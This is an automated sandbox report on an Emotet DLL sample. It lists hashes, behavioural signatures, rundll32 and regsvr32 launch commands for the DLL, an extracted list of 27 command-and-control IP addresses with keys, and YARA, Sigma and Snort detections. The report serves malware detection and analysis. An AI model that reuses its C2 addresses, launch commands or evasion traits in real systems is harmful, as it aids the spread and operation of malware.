Play interactive tour

Edit tour

Windows Analysis Report hPJnda9rBy.dll

Overview

General Information

Sample Name:	hPJnda9rBy.dll
Analysis ID:	553354
MD5:	56c2941eb73ea59306cc9d2a6b15974c
SHA1:	8d483f2069955ae7a3f7e70e6dafa2641cbf4a75
SHA256:	7caa923401ec9a16969f0b37225b77cd16c6923abff2eda76f1fa9a35bff2879
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Suspicious Call by Ordinal

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Registers a DLL

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6532 cmdline: loaddll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 6540 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6620 cmdline: rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6640 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5792 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Knpnqswfpazuozi\koewoajrwakr.ckb",kzlZNp MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5604 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Knpnqswfpazuozi\koewoajrwakr.ckb",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 6536 cmdline: regsvr32.exe /s C:\Users\user\Desktop\hPJnda9rBy.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6616 cmdline: rundll32.exe C:\Users\user\Desktop\hPJnda9rBy.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 536 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 6016 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 4180 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6532 -ip 6532 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 7024 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5556 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4552 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.669073242.0000000000E40000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.685263921.0000000005281000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.684322708.00000000031C0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.684701271.0000000004AC1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.688210118.00000000037E1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.719107308.0000000004941000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.669823060.0000000004480000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.677964446.0000000000820000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.685292012.00000000052B0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.676011964.0000000000820000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.685429920.0000000005641000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.719259656.0000000004B51000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.685397124.0000000005610000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.669847564.00000000044B1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.685144979.0000000005121000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.685224843.0000000005250000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.685049749.0000000005001000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.719178137.0000000004A71000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.687920491.0000000003520000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.719295807.0000000004B80000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.685326019.00000000052E1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.684986586.0000000004FB0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.678063941.0000000000861000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000002.00000002.669249846.0000000002F11000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.702950192.0000000000820000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.685112085.00000000050F0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.719142845.0000000004A40000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.719325918.0000000004BB1000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.719229913.0000000004B20000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.718771472.00000000042E0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.719080684.0000000004910000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.676117547.0000000000861000.00000020.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.rundll32.exe.4430000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5610000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4b20000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.50f0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5250000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5250000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4480000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4bb0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.860000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.820000.3.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3520000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.31c0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.3520000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.52e0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5280000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.37e0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4940000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5120000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.42e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.50f0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.4480000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4b20000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4b50000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.2f10000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.42e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4b80000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.820000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4a40000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4b80000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4a70000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.4fb0000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.e40000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4910000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.4ac0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.820000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.820000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.860000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5640000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5610000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4910000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.52b0000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.4a40000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.5000000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.4fb0000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.44b0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.31c0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.52b0000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.820000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.820000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
2.2.regsvr32.exe.e40000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.860000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 46 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6540, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1, ProcessId: 6620

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.4b20000.6.raw.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["45.138.98.34:80", "69.16.218.101:8080", "51.210.242.234:8080", "185.148.168.220:8080", "142.4.219.173:8080", "54.38.242.185:443", "191.252.103.16:80", "104.131.62.48:8080", "62.171.178.147:8080", "217.182.143.207:443", "168.197.250.14:80", "37.44.244.177:8080", "66.42.57.149:443", "210.57.209.142:8080", "159.69.237.188:443", "116.124.128.206:8080", "128.199.192.135:8080", "195.154.146.35:443", "185.148.168.15:8080", "195.77.239.39:8080", "207.148.81.119:8080", "85.214.67.203:8080", "190.90.233.66:443", "78.46.73.125:443", "78.47.204.80:443", "37.59.209.141:8080", "54.37.228.122:443"], "Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"]}

Multi AV Scanner detection for submitted file

Show sources

Source: hPJnda9rBy.dll

Virustotal: Detection: 18%

Perma Link

Source: hPJnda9rBy.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb(a source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.700670403.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000002.702229591.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.684427719.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.700685466.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.689014142.0000000000E09000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.684358827.0000000000E03000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.684475829.0000000000E09000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.689071847.0000000004742000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdbxa source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.689189866.0000000004745000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689071847.0000000004742000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbTa source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.689189866.0000000004745000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689071847.0000000004742000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdbfa source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb"a source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb~a source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.689071847.0000000004742000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.689176981.0000000004740000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbla source: WerFault.exe, 0000000B.00000003.689196954.0000000004748000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.689088734.0000000004748000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.689066164.0000000004601000.00000004.00000001.sdmp
Source:	Binary string: aEnjrHnCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000B.00000002.701961614.0000000000182000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.5:49775 -> 45.138.98.34:80
Source: Traffic	Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49776 -> 69.16.218.101:8080

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 45.138.98.34:80
Source: Malware configuration extractor	IPs: 69.16.218.101:8080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.168.220:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 104.131.62.48:8080
Source: Malware configuration extractor	IPs: 62.171.178.147:8080
Source: Malware configuration extractor	IPs: 217.182.143.207:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 210.57.209.142:8080
Source: Malware configuration extractor	IPs: 159.69.237.188:443
Source: Malware configuration extractor	IPs: 116.124.128.206:8080
Source: Malware configuration extractor	IPs: 128.199.192.135:8080
Source: Malware configuration extractor	IPs: 195.154.146.35:443
Source: Malware configuration extractor	IPs: 185.148.168.15:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 190.90.233.66:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 104.131.62.48 104.131.62.48

Source: global traffic

TCP traffic: 192.168.2.4:49771 -> 69.16.218.101:8080

Source: unknown

Network traffic detected: IP country count 11

Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 45.138.98.34
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101
Source: unknown	TCP traffic detected without corresponding DNS query: 69.16.218.101

Source: svchost.exe, 00000013.00000003.795815755.000001691B392000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
